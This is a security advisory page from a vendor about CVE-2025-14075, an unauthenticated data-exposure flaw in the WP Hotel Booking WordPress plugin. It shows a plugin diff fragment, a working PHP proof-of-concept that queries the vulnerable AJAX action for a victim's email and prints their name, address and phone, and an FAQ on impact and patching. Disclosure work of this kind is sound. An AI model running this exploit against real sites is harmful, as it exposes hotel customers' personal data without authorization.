+		$coupon = hb_get_coupons_active( $today, $code );
+
+		$output   = ob_get_clean();
+		$response = array();
+		if ( $coupon ) {
+			$coupon   = HB_Coupon::instance( $coupon );
+			$response = $coupon->validate();
+			if ( $response['is_valid'] ) {
+				$response['result'] = 'success';
+				$response['type']   = get_post_meta( $coupon->ID, '_hb_coupon_discount_type', true );
+				$response['value']  = get_post_meta( $coupon->ID, '_hb_coupon_discount_value', true );
+				// set session
+				WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', $coupon->post->ID );
+				hb_add_message( __( 'Coupon code applied', 'wp-hotel-booking' ) );
+			}
+		} else {
+			$response['message'] = __( 'Coupon does not exist!', 'wp-hotel-booking' );
+		}
+		hb_send_json(
+			$response
+		);
+	}
+
+	static function remove_coupon() {
+		! session_id() && session_start( array( 'read_and_close' => true ) );
+		// delete_transient( 'hb_user_coupon_' . session_id() );
+		WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', null );
+		hb_add_message( __( 'Coupon code removed', 'wp-hotel-booking' ) );
+		hb_send_json(
+			array(
+				'result' => 'success',
+			)
+		);
+	}
+
+	static function parse_booking_params() {
+
+		check_ajax_referer( 'hb_booking_nonce_action', 'nonce' );
+
+		$check_in     = hb_get_request( 'check_in_date' );
+		$check_out    = hb_get_request( 'check_out_date' );
+		$num_of_rooms = hb_get_request( 'hb-num-of-rooms' );
+
+		$params = array(
+			'hotel-booking'   => hb_get_request( 'hotel-booking' ),
+			'check_in_date'   => $check_in,
+			'check_out_date'  => $check_out,
+			'hb-num-of-rooms' => $num_of_rooms,
+		);
+
+		// print_r($params);
+		hb_send_json(
+			array(
+				'success' => 1,
+				'sig'     => base64_encode( serialize( $params ) ),
+			)
+		);
+	}
+
+	static function ajax_add_to_cart() {
+		$res = new WPHB_REST_Response();
+
+		try {
+			if ( ! check_ajax_referer( 'hb_booking_nonce_action', 'nonce' ) ) {
+				throw new Exception( __( 'Invalid request', 'wp-hotel-booking' ) );
+			}
+
+			$qty            = WPHB_Helpers::get_param( 'hb-num-of-rooms', 1, 'int' );
+			$room_id        = WPHB_Helpers::get_param( 'room-id', 0, 'int' );
+			$check_in_

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14075 - WP Hotel Booking <= 2.2.7 - Unauthenticated Sensitive Information Exposure via 'email' Parameter

<?php
$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// Step 1: First, obtain a valid nonce from a public page
// The plugin generates nonces with action 'hb_booking_nonce_action'
// These are typically available on booking/search pages
$nonce = 'REPLACE_WITH_VALID_NONCE';

// Step 2: Target email address to query
$email = 'victim@example.com';

// Step 3: Prepare the exploit payload
$post_data = array(
    'action' => 'hotel_booking_fetch_customer_info',
    'email' => $email,
    'nonce' => $nonce
);

// Step 4: Execute the attack
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 5: Parse and display results
if ($http_code == 200) {
    $data = json_decode($response, true);
    if ($data && !empty($data)) {
        echo "[+] SUCCESS: Customer data retrieved:n";
        echo "Customer ID: " . ($data['ID'] ?? 'N/A') . "n";
        echo "Email: " . ($data['data']['_hb_customer_email'] ?? 'N/A') . "n";
        echo "First Name: " . ($data['data']['_hb_customer_first_name'] ?? 'N/A') . "n";
        echo "Last Name: " . ($data['data']['_hb_customer_last_name'] ?? 'N/A') . "n";
        echo "Address: " . ($data['data']['_hb_customer_address'] ?? 'N/A') . "n";
        echo "City: " . ($data['data']['_hb_customer_city'] ?? 'N/A') . "n";
        echo "State: " . ($data['data']['_hb_customer_state'] ?? 'N/A') . "n";
        echo "Postal Code: " . ($data['data']['_hb_customer_postal_code'] ?? 'N/A') . "n";
        echo "Country: " . ($data['data']['_hb_customer_country'] ?? 'N/A') . "n";
        echo "Phone: " . ($data['data']['_hb_customer_phone'] ?? 'N/A') . "n";
    } else {
        echo "[-] No customer data found for email: $emailn";
        echo "Raw response: $responsen";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
    echo "Response: $responsen";
}
?>

Frequently Asked Questions

What is CVE-2025-14075?
Overview of the vulnerability
CVE-2025-14075 is a vulnerability in the WP Hotel Booking plugin for WordPress, affecting versions up to and including 2.2.7. It allows unauthenticated users to access sensitive customer information through an AJAX action that lacks proper capability checks.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability occurs in the ‘hotel_booking_fetch_customer_info’ AJAX action, which can be accessed without authentication. Attackers can send a request with a valid email address and nonce to retrieve sensitive customer data, including personal identifiable information.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the WP Hotel Booking plugin version 2.2.7 or earlier is affected. Administrators should check their plugin version and assess if they are using the vulnerable version.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the WP Hotel Booking plugin installed. If it is version 2.2.7 or earlier, your site is at risk. Additionally, testing for the vulnerability can be done using the proof of concept provided.
How can I fix or mitigate this issue?
Recommended actions
To fix this vulnerability, update the WP Hotel Booking plugin to version 2.2.8 or later, where the issue has been patched. Additionally, review your site’s security practices to ensure proper user capability checks are in place.
What does the severity level of 'Medium' mean?
Understanding risk assessment
A medium severity level indicates that the vulnerability poses a moderate risk to the affected system. While exploitation requires some knowledge and effort, successful attacks can lead to significant data exposure, necessitating prompt action.
What is the CVSS score for this vulnerability?
Importance of CVSS scoring
The CVSS score for CVE-2025-14075 is 5.3, which reflects a medium severity level. This score helps organizations prioritize their response and remediation efforts based on potential impact.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation can lead to unauthorized access to sensitive customer information, including names, addresses, and email addresses. This can result in privacy violations, identity theft, and potential legal issues related to data protection regulations.
How does the proof of concept demonstrate the issue?
Explaining the exploit
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable endpoint. It shows the necessary parameters, including a valid nonce, to retrieve customer data without authentication.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect exploitation, immediately update the plugin to the patched version. Review server logs for unauthorized access attempts and consider notifying affected customers if their data may have been compromised.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, consider implementing security plugins that monitor for vulnerabilities, enforce strong user authentication, and regularly audit your site for security best practices.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-14075 can be found in the official CVE database and security advisories from WordPress security experts. Keeping abreast of security updates and best practices is crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations